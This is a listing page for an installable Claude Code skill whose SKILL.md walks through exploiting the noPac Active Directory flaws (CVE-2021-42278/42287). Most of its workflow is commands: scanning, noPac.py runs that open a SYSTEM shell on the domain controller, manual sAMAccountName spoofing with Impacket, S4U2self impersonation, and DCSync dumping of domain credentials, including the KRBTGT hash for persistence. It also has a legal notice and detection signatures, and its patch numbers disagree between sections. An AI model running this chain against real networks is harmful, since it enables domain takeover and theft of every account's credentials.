New to Claude Skills? Learn how to install them →

mukul975 on GitHub

Exploiting noPac CVE-2021-42278/42287

Free

Escalate privileges in Active Directory environments securely.

Get this skill

Free · Opens the source repo

What Exploiting noPac CVE-2021-42278/42287 does

The Exploiting noPac skill provides a method for security professionals to exploit a critical privilege escalation vulnerability in Active Directory. This skill leverages two vulnerabilities: CVE-2021-42278, which allows an attacker to spoof the sAMAccountName of a machine account, and CVE-2021-42287, which causes confusion in the Kerberos PAC validation process. Together, these vulnerabilities can enable an authenticated domain user to escalate their privileges to that of a Domain Admin, potentially compromising the entire domain in a matter of seconds.

The skill is designed for use in red teaming and penetration testing scenarios, where authorized testing of Active Directory environments is necessary. It incorporates tools like Impacket and secretsdump.py to facilitate the exploitation process, allowing users to scan for vulnerabilities, create or modify machine accounts, and perform DCSync to dump domain credentials. The skill is built for security professionals who are familiar with red teaming concepts and have the appropriate permissions to conduct such tests.

Users can follow a structured workflow that includes vulnerability scanning, exploitation, and post-exploitation steps. The provided scripts and commands guide users through the process, ensuring that they can effectively demonstrate the exploit in a controlled environment. This skill is particularly valuable for those looking to enhance their understanding of Active Directory security and develop detection capabilities based on offensive techniques.

Overall, the Exploiting noPac skill serves as a practical tool for cybersecurity experts aiming to validate the security posture of Active Directory implementations and educate themselves on the implications of these vulnerabilities.

When to use it

Use this skill during authorized penetration tests or red team engagements focused on Active Directory security.

When not to use it

This skill is not suitable for unauthorized testing or environments where you do not have explicit permission to conduct security assessments.

What you can build with it

Red Team Engagements

Utilize the noPac exploit during red team exercises to assess the security of Active Directory implementations.

Vulnerability Assessment

Scan for the noPac vulnerabilities in a controlled lab environment to validate security configurations.

Educational Purposes

Use this skill to learn about privilege escalation techniques and the implications of Active Directory vulnerabilities.

How to install Exploiting noPac CVE-2021-42278/42287

View source

1. Install with the skills CLI

npx skills add mukul975/anthropic-cybersecurity-skills/exploiting-nopac-cve-2021-42278-42287 --agent claude-code

2. Or install it manually

Download the skill folder and drop it into ~/.claude/skills/ for all projects, or .claude/skills/ to scope it to one repo. Restart Claude Code so it picks up the new skill.

Anthropic's agentic coding CLI, and the reference implementation of Agent Skills. Drop a skill folder into ~/.claude/skills and Claude Code loads it automatically whenever a task matches the skill's description. Claude Code docs

Inside SKILL.md

Written by mukul975

Exploiting noPac (CVE-2021-42278 / CVE-2021-42287)

Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.

Overview

noPac is a critical exploit chain combining two Active Directory vulnerabilities: CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (KDC PAC confusion). Together, they allow any authenticated domain user to escalate to Domain Admin privileges, potentially achieving full domain compromise in under 60 seconds. CVE-2021-42278 allows an attacker to modify a machine account's sAMAccountName attribute to match a Domain Controller's name (minus the trailing $). CVE-2021-42287 exploits a flaw in the Kerberos PAC validation where the KDC, unable to find the renamed account, falls back to appending $ and issues a ticket for the Domain Controller account. Microsoft patched both vulnerabilities in November 2021 (KB5008380 and KB5008602), but many environments remain unpatched. The exploit was publicly released by cube0x0 and Ridter in December 2021.

When to Use

  • When performing authorized security testing that involves exploiting nopac cve 2021 42278 42287
  • When analyzing malware samples or attack artifacts in a controlled environment
  • When conducting red team exercises or penetration testing engagements
  • When building detection capabilities based on offensive technique understanding

Prerequisites

  • Familiarity with red teaming concepts and tools
  • Access to a test or lab environment for safe execution
  • Python 3.8+ with required dependencies installed
  • Appropriate authorization for any testing activities

Objectives

  • Scan the target domain for noPac vulnerability (CVE-2021-42278/42287)
  • Create or leverage a machine account with modified sAMAccountName
  • Exploit the KDC PAC confusion to obtain a TGT for the Domain Controller
  • Use the DC ticket to perform DCSync and dump domain credentials
  • Achieve Domain Admin access from a standard domain user account
  • Document the complete exploitation chain with evidence

MITRE ATT&CK Mapping

  • T1068 - Exploitation for Privilege Escalation
  • T1136.002 - Create Account: Domain Account
  • T1078.002 - Valid Accounts: Domain Accounts
  • T1558 - Steal or Forge Kerberos Tickets
  • T1003.006 - OS Credential Dumping: DCSync

Workflow

Phase 1: Vulnerability Scanning

  1. Check if the domain is vulnerable using the noPac scanner:
    # Using cube0x0's noPac scanner
    python3 scanner.py domain.local/user:'Password123' -dc-ip 10.10.10.1
    
    # Using CrackMapExec module
    crackmapexec smb 10.10.10.1 -u user -p 'Password123' -M nopac
    
  2. Verify the MachineAccountQuota (default is 10, allows any user to join computers):
    # Check MachineAccountQuota via LDAP
    python3 -c "
    import ldap3
    server = ldap3.Server('10.10.10.1')
    conn = ldap3.Connection(server, 'domain.local\\user', 'Password123', auto_bind=True)
    conn.search('DC=domain,DC=local', '(objectClass=domain)', attributes=['ms-DS-MachineAccountQuota'])
    print(conn.entries[0]['ms-DS-MachineAccountQuota'])
    "
    

Phase 2: Exploitation with noPac Tool

  1. Run the full noPac exploit chain:
    # Using cube0x0's noPac (gets a shell on the DC)
    python3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \
      -dc-host DC01 -shell --impersonate administrator -use-ldap
    
    # Using Ridter's noPac (alternative implementation)
    python3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \
      --impersonate administrator -dump
    
  2. The exploit automatically:
    • Creates a new machine account (or uses an existing one)
    • Renames the machine account's sAMAccountName to match the DC (e.g., "DC01")
    • Requests a TGT for the spoofed account name
    • Restores the original sAMAccountName
    • Uses S4U2self to obtain a service ticket impersonating the target user
    • The KDC finds no account matching "DC01" and falls back to "DC01$" (the real DC)

Phase 3: Post-Exploitation

  1. With the obtained Domain Controller ticket, perform DCSync:
    # DCSync using secretsdump.py with the Kerberos ticket
    export KRB5CCNAME=administrator.ccache
    secretsdump.py -k -no-pass domain.local/administrator@DC01.domain.local
    
    # Or directly through the noPac shell
    # The shell runs as SYSTEM on the DC
    
  2. Alternatively, obtain a semi-interactive shell:
    python3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \
      -dc-host DC01 -shell --impersonate administrator -use-ldap
    

Phase 4: Manual Exploitation Steps

  1. Create a machine account:
    addcomputer.py -computer-name 'ATTACKPC$' -computer-pass 'AttackPass123' \
      -dc-ip 10.10.10.1 domain.local/user:'Password123'
    
  2. Clear the SPN and rename sAMAccountName:
    # Rename machine account sAMAccountName to DC name (without $)
    renameMachine.py -current-name 'ATTACKPC$' -new-name 'DC01' \
      -dc-ip 10.10.10.1 domain.local/user:'Password123'
    
  3. Request a TGT for the spoofed name:
    getTGT.py -dc-ip 10.10.10.1 domain.local/'DC01':'AttackPass123'
    
  4. Restore the original machine name:
    renameMachine.py -current-name 'DC01' -new-name 'ATTACKPC$' \
      -dc-ip 10.10.10.1 domain.local/user:'Password123'
    
  5. Use S4U2self for impersonation:
    export KRB5CCNAME=DC01.ccache
    getST.py -self -impersonate 'administrator' -altservice 'cifs/DC01.domain.local' \
      -k -no-pass -dc-ip 10.10.10.1 domain.local/'ATTACKPC$'
    

Tools and Resources

ToolPurposePlatform
noPac (cube0x0)Automated scanner and exploiterPython
noPac (Ridter)Alternative exploit implementationPython
ImpacketKerberos ticket manipulation, DCSyncPython
CrackMapExecVulnerability scanning modulePython
RubeusWindows Kerberos ticket operationsWindows (.NET)
secretsdump.pyPost-exploitation credential dumpingPython

CVE Details

CVEDescriptionCVSSPatch
CVE-2021-42278sAMAccountName spoofing (machine accounts)7.5KB5008102
CVE-2021-42287KDC PAC confusion / privilege escalation7.5KB5008380

Detection Signatures

IndicatorDetection Method
Machine account sAMAccountName changeEvent 4742 (computer account changed) with sAMAccountName modification
New machine account creationEvent 4741 (computer object created)
TGT request for account without trailing $Kerberos audit log analysis
S4U2self requests from non-DC machine accountsEvent 4769 with unusual service ticket requests
Rapid sequence: create account, rename, request TGTSIEM correlation rule for noPac attack pattern

Validation Criteria

  • Domain scanned for noPac vulnerability
  • MachineAccountQuota verified (default 10)
  • Exploit executed successfully (shell or DCSync)
  • Domain Admin privileges obtained from standard user
  • DCSync performed to dump domain credentials
  • KRBTGT hash obtained for persistence validation
  • Attack chain documented with timestamps
  • Patch status verified (KB5008380, KB5008602)

Frequently asked questions about Exploiting noPac CVE-2021-42278/42287

Similar skills